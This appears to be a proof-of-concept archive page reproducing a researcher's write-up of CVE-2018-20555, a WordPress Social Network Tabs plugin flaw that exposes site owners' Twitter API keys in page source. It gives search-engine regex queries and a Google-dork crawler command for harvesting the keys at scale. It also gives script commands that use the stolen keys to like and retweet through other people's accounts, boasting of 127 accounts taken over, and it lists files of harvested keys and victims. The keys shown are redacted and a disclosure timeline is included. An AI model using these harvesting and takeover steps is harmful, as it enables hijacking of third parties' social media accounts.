POC详情: 58e98b75a1395312f0e94e71a6ae09854a7f1427

标题: WordPress Social Network Tabs 信息泄露漏洞 (CVE-2018-20555)
描述:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。Social Network Tabs是使用在其中的一个社交媒体插件。 WordPress Social Network Tabs中存在安全漏洞。攻击者可利用该漏洞绕过数据的访问限制,获取敏感信息。
Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555
# CVE-2018-20555
The Wordpress Plugin called [Social Network Tabs](http://www.designchemical.com/blog/index.php/premium-wordpress-plugins/premium-wordpress-plugin-social-network-tabs/), made by the company Design Chemical, is leaking twice the Twitter access_token, access_token_secret, consumer_key and consumer_secret of their user which is leading to a takeover of their Twitter account.

This is caused by the following lines of code within the page where the Twitter widget is displayed:
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"

## Exploitation
Thanks to [Publicwww](https://publicwww.com), with the following search queries, I managed to retrieve the Twitter access_token, access_token_secret, consumer_key and consumer_secret from 539 vulnerable websites:

- dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
- dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
- dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
- dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

All the keys are available in twitter_keys.csv.

## How to
Test the Twitter API keys in twitter_keys.csv
python test_twitter_api_keys.py -t
The 1st time I had run this command, I got the information of 446 Twitter accounts. It's worth mentioning that there were 2 verified accounts in the list and multiple accounts with more than 10K+ followers. All the vulnerable accounts are in vulnerable_accounts.txt.

## Fun part
Like the tweet of your choice
python test_twitter_api_keys.py -l [tweet_id]

Retweet the tweet of your choice
python test_twitter_api_keys.py -r [tweet_id]

The 1st time I run this command, I managed to liked the tweet of my choice 127 times, which shown that 127 Twitter api keys had the read write rights aka I was able to take over 127 Twitter accounts (change profile picture, like, retweet, change bio,...) due to this key leaks.

## UPDATE 17/01/18
A lot of websites and so Twitter accounts are still vulnerable to this issue. In order to identify them, I created a scraper
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10
The total of results for this Google search query is 3550. Among the 9 first pages, I managed to retrieved 78 keys (86%). Enjoy!

## Disclosure
- 01/12/18: Disclosure to Twitter
- 0X/12/18: Twitter deactivated all the keys
- 11/12/18: Acknowledgement as a valid security issue by Twitter

## Contact
Follow me on [Twitter](https://twitter.com/fs0c131y)! You can also find a small part of my work at [https://fs0c131y.com](https://fs0c131y.com)

## Credits
The investigation and the POC has been made with ❤️ by @fs0c131y

[4.0K] /data/pocs/58e98b75a1395312f0e94e71a6ae09854a7f1427 ├── [3.3K] README.md ├── [ 29] requirements.txt ├── [2.3K] test_twitter_api_keys.py ├── [4.0K] TwitterApiKeysSearchEngine │   ├── [ 296] scrapy.cfg │   └── [4.0K] TwitterApiKeysSearchEngine │   ├── [4.0K] common │   │   ├── [ 21] __init__.py │   │   ├── [ 311] SearchEngines.py │   │   └── [ 783] SearchResultPages.py │   ├── [ 0] __init__.py │   ├── [ 249] items.py │   ├── [ 524] pipelines.py │   ├── [ 848] settings.py │   └── [4.0K] spiders │   ├── [ 161] __init__.py │   └── [1.5K] TwitterApiKeysSpider.py ├── [ 95K] twitter_keys.csv └── [ 29K] vulnerable_accounts.txt 4 directories, 15 files
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